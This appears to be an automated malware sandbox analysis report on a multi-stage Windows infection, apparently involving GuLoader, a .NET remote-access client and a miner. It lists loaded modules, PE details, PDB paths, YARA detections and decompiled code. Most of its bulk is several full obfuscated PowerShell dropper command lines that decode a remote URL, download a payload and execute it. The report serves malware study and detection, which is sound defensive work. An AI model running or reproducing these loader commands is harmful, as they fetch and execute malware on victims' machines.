                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: slc.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: sppc.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: sxs.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: mpr.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: linkinfo.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: ntshrui.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: cscapi.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\GameBarPresenceWriter.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B6390DB1-4C44-4BA4-BA51-BBF4BED47C37}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Downloads\haus\ABC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                            Source: wow.exeStatic PE information: Image base 0x140000000 > 0x60000000
                            Source: wow.exeStatic file information: File size 15479739 > 1048576
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: wow.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: wow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: explorer.pdbUGP source: traf.exe, 0000000F.00000002.2653560633.0000000002730000.00000040.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_uuid.pdb source: wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: wow.exe, 00000000.00000003.2159812724.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\Private\Downloads\KDP-compatible-driver-loader-main\KDP-compatible-driver-loader-main\Loader\Compiled\Loader.pdb source: Loader.exe, 0000000A.00000000.2256564650.00007FF6B9583000.00000002.00000001.01000000.00000023.sdmp, Loader.exe, 0000000A.00000002.4626555247.00007FF6B9583000.00000002.00000001.01000000.00000023.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_multiprocessing.pdb source: wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ers\Private\Downloads\KDP-compatible-driver-loader-main\KDP-compatible-driver-loader-main\Loader\Compiled\Loader.pdb source: wow.exe, 00000009.00000003.3069520822.000001D428E03000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2821519239.000001D428DF9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2915312969.000001D428DF9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2963862992.000001D428E02000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: explorer.pdb source: traf.exe, 0000000F.00000002.2653560633.0000000002730000.00000040.00001000.00020000.00000000.sdmp
                            Source: Binary string: Task32Watch.pdb source: wow.exe, 00000009.00000003.2377176921.000001D42C330000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2540988639.000001D42C330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: svchost.pdb source: sel1.exe, 0000000C.00000002.2273554875.0000000000480000.00000040.10000000.00040000.00000000.sdmp, svchost.exe
                            Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: svchost.pdbUGP source: sel1.exe, 0000000C.00000002.2273554875.0000000000480000.00000040.10000000.00040000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\Document_26390\bin\Debug\Secured\Enalib.pdb source: wow.exe, 00000009.00000003.2994891214.000001D42D52C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2479967055.000001D42D554000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2342292239.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2448526134.000001D42CDFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2562218180.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2351696699.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2563582335.000001D42CC81000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C440000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2549690962.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2572286803.000001D42C440000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3066267715.000001D42D556000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2549690962.000001D42CC80000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2342292239.000001D42CC80000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2879381009.000001D42CE01000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3003548070.000001D42D556000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: wow.exe, 00000009.00000003.2432947411.000001D42C321000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2377176921.000001D42C300000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-311\Release\win32evtlog.pdb source: wow.exe, 00000000.00000003.2190025964.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wow.exe, 00000000.00000003.2159339518.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_asyncio.pdb source: wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: Task32Watch.pdbl source: wow.exe, 00000009.00000003.2377176921.000001D42C330000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2540988639.000001D42C330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: wow.exe, 00000009.00000003.2601584380.000001D42D5A9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2888440615.000001D42CB7E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2740289558.000001D42CEC9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2881627835.000001D42CEEA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2566541064.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2678253097.000001D42CEC6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2572286803.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2593037162.000001D42CB66000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2879781021.000001D42CEC5000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2845057481.000001D42CB66000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2364327641.000001D42D59A000.00000004.00000020.00020000.00000000.sdmp
                            Source: wow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: wow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: wow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: wow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: wow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                            Data Obfuscation

                            barindex
                            Yara detected GuLoader
                            Source: Yara matchFile source: 00000027.00000002.2745669289.0000020DA7F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000003A.00000002.3007283451.0000023F90097000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000034.00000002.3029494022.000001E95DA90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: vapo.exe.9.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: vapo.exe.9.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: vapo.exe.9.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: vapo.exe.9.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: vapo.exe.9.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: vapo.exe.9.dr, Messages.cs.Net Code: Memory
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Messages.cs.Net Code: Memory
                            Found suspicious powershell code related to unpacking or dynamic code loading
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tricresol)$GLOBAl:NoNSkidDInG = [sYstEm.teXT.enCoding]::aScIi.getsTrIng($urethroSExuaL)$GLObAL:bAgKLOGT=$noNsKIdDiNg.SuBStRinG($FIeND,$honK)<#Skanderingers Galoperet Udgiftsfrtes Flg
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tillidserklringers110)$GlobAL:dybStruKTURS = [SYSTEM.teXT.EnCODing]::ASCIi.GeTSTrINg($OLdeFDRene)$GLOBal:pHosPHORESced228=$DybStrUKTuRs.sUBstriNG($tHRObBINgLY,$miLLIMiCROnNDtgTsnivea
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Eure)$GlobAL:ampHOrIC = [SySTEM.TExt.ENcoDInG]::ASCII.gEtSTRiNg($aPpariTOR)$glOBAL:EtiOlize=$aMPHoRic.suBSTrInG($SOliDARiSTiC174,$gylDigE94)<#Personalekompensationernes Reline Rastle
                            Suspicious powershell command line found
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Praefectorial61; function buxine($frugtavlens){$Millimicron=3;do{$Hestevognens+=$frugtavlens[$Millimicron];$Millimicron+=4} until(!$frugtavlens[$Millimicron])$Hestevognens}function Phonetist($Timebilletten){ .($procommemoration) ($Timebilletten)}$Bromphenol=buxine 'varnBelET eT.ru.RefW';$Bromphenol+=buxine 'SameLo bSkaCEroLUndigruE.rsn.ndT';$Bruttotonnagens=buxine ' trMShioAngzjoriArblTeblDykaWal/';$Hysses=buxine 'E rTUndlKnisRa 1 Es2';$Wispiness=' .t[ pn RrE ,ot lt.StrSRedESn RMagVSkaiSorCkeyEEltPMi,o GaIPhonDebTKr.mSrbaSt.NFeja S.GDelECytR Qu]Sha:Hyd:st SGoueJazClocuResrM sIEj,tA.lyEdipOb,r SiOSaltOliO B C HiON nl Ka= S.$UniHShoYRu sAlfS VaEDanS';$Bruttotonnagens+=buxine ' Fe5Unm.Su 0Fil Th(RenWFisi emnV,td NooMaaw losBl, UfoN coT Ku Gyp1,ro0 Sr.Bad0Sol;,ou Fu W VeiNonnHen6Shu4sch;S p dex nr6Cat4Foc;San Kryr U,vAfs:Cag1 nc3Ind4Trl.squ0,ou)Sur StyGgeneDiscSkok,vmomas/Sac2Ge 0 Ry1Swa0Ske0 ro1Led0Mil1 ft ecF bii Hor apeEksf HeoSvmxD t/Par1Re.3par4Par.Tu.0';$Procedurereglerne=buxine ' roUDiasKrbe w RVra- uaStoG StE Ban.jrt';$Isotomous222=buxine 'UdmhAt t ActUnlpAsysByg:lev/L,n/NonfFiliLivl FoeFrsd B,nTrk. BeeEnkuDei/ otlFormFurjThyMhae1LanIFoutSneiForFTilCSubHArrjuraYHasA H 4StrJAwaN faRT eBAnkYTraBTom3 Sm4Wes/ MuKSnraCapnIdeaSe r .oiPare lrG ne.genBrusTet.P.cq ,uxMond';$Raukle=buxine 'B,d>';$procommemoration=buxine ' V IFraET.aX';$Skiftnings='Teglvrksovn';$Sbredders='\Rten.Men';Phonetist (buxine ' Sc$.erg ,oLBanoRe.bUnaA,ral re:Spon TiO egn enOgenwA lnOpleR mrSem= eh$ A,e,erNHivvpre:CisAEklP FopAduDRe aB.lt dlaSta+Ban$RenSDykbBacr neD fd,urdStaeAutrU eS');Phonetist (buxine 'P e$OmvgmodlB loDkbBP raHreLMed: DifAalR VaaTott enrTa AP eeCinD B ESyslV.rS Ples,is KodU dA I GSenE ReNut =Nac$ForImins FooOvetspro S,MHemOCobUStosf.r2 Po2Pea2Aff.YonSCykpg,sLEugi DdT N (Unc$datrRaaAGr UHankTypLPowEG k)');Phonetist (buxine $Wispiness);$Isotomous222=$Fratraedelsesdagen[0];$sagnomspundent=(buxine 'C n$UneG raLAndOAmabSu,aSmlLObs:Up.D.eoEPreF ose FiNInteBepsskatPi.rHykA UntS aeKap= TrnMaxEPrewD s- rooMusbHykj UnesndCTret Lo ImpSU myLacSD wtViseHa.mFor.ung$U vBI drHouO Afm lP WahBu ESa NTiloMe.L');Phonetist ($sagnomspundent);Phonetist (buxine 'Sup$ etDCoue ymfMeseFornSp eFarsAfttLarrFleaUgetAcce R..Ru.He pe elaChrdEnfeUnsr MesArb[Dis$NutP arUndo wac N,e ErdtatuModr PoeL mrD aeAghgSuplBlae.murDe nLa e iv] T,=Bas$RenB Snr.onuStotS mtEksoSentinto Bin Conpr.aPolg Ene S.nFles');$Plectognathous=buxine 'Ank$ IrDIsoeskmfbule Agn O eBeas C tvarrW aaCiat O ePre.u,rD sooVinwN kn ylUdko SvaCryd LnFTkkiSpdlDemeBuk(Me.$Th IO.ksDetogrotAnloSupmAuto EgumonsSvi2 M 2 Pe2Fol,Mor$DriO I r,std omrFore eb.eleSuph ReaIntnHaad,enlOpfiPronHolgSo eGhonDom)';$Ordrebehandlingen=$nonowner;Phonetist (buxine 'Sor$M,agPr.lNonoOpubS ea,veL jo:AgrN Pui nfT axRBj,oU sp.ndH.ynY E T ubiPerCAmo= Na(BertRipELa SStrT.nb-S gPS laCo.tlevhTnk Lig$AfdoRygR oldDenrgrueD mBSy
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen 